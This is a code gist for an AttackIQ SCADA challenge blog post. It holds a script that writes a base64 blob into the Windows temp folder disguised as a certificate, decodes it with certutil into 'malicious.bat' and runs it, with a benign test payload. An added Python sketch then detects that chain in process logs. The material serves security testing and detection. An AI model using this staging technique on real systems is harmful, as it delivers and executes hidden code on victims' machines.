Last active May 2, 2018 23:59
AttackIQ GameOn! Scada Blog Post
//Write out base64 encoded file to Windows TEMP directory
ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C echo -----BEGIN CERTIFICATE----- > %TEMP%\\test.txt");
ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C echo ZWNobyBzZWN1cml0eXRlc3QgPiAlVEVNUCVcXG1hbGljaW91cy5leGU= >> %TEMP%\\test.txt");
ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C echo -----END CERTIFICATE----- >> %TEMP%\\test.txt");
//Decode base64 encoded file and output malicious batch file
ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C certutil -decode %TEMP%\\test.txt %TEMP%\\malicious.bat");
//Execute malicious batch file
ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C %TEMP%\\malicious.bat");
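The three steps in the script above (echo a PEM-armoured file, decode it with certutil, run the output) leave a recognisable chain in process command lines. The following detection sketch is an added example, not part of the original gist; the function names, rule labels and sample lines are hypothetical, and it assumes cmd.exe command lines are available from process-creation logging.

```python
import re

# Shell echo that starts a PEM-armoured file, and certutil decoding src -> dst.
PEM_ECHO = re.compile(r'echo\s+-----BEGIN CERTIFICATE-----\s*>+\s*(\S+)', re.I)
DECODE = re.compile(r'certutil(?:\.exe)?\s+[-/]decode\s+(\S+)\s+(\S+)', re.I)

def norm(text):
    """Lower-case and collapse doubled backslashes so paths compare equal."""
    return re.sub(r'\\+', r'\\', text.strip('"')).lower()

def analyze(cmdlines):
    """Return (index, rule, path) findings for the stage/decode/execute chain."""
    findings, staged, decoded = [], set(), set()
    for i, line in enumerate(cmdlines):
        if m := PEM_ECHO.search(line):
            staged.add(norm(m.group(1)))
            findings.append((i, "pem-header-echo", norm(m.group(1))))
        elif m := DECODE.search(line):
            src, dst = norm(m.group(1)), norm(m.group(2))
            decoded.add(dst)
            rule = "decode-of-staged-file" if src in staged else "certutil-decode"
            findings.append((i, rule, dst))
        else:
            # Any later command line naming a decoded output is treated as
            # execution of (or access to) the dropped file.
            for dst in sorted(decoded):
                if dst in norm(line):
                    findings.append((i, "decoded-file-referenced", dst))
    return findings

# Constructed sample mirroring the script's steps (payload replaced by a
# placeholder); assumed to be cmd.exe command lines, not real telemetry.
SAMPLE = [
    r'cmd.exe /C echo -----BEGIN CERTIFICATE----- > %TEMP%\\test.txt',
    r'cmd.exe /C echo QUJDRA== >> %TEMP%\\test.txt',
    r'cmd.exe /C echo -----END CERTIFICATE----- >> %TEMP%\\test.txt',
    r'cmd.exe /C certutil -decode %TEMP%\\test.txt %TEMP%\\malicious.bat',
    r'cmd.exe /C %TEMP%\\malicious.bat',
    r'cmd.exe /C dir %TEMP%',
]

if __name__ == "__main__":
    for idx, rule, path in analyze(SAMPLE):
        print(f"line {idx}: {rule}: {path}")
```

Correlating the decode output path with later command lines is what separates this chain from routine certificate handling with certutil.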
Added a file extension for syntax highlighting. Not actually a JS file.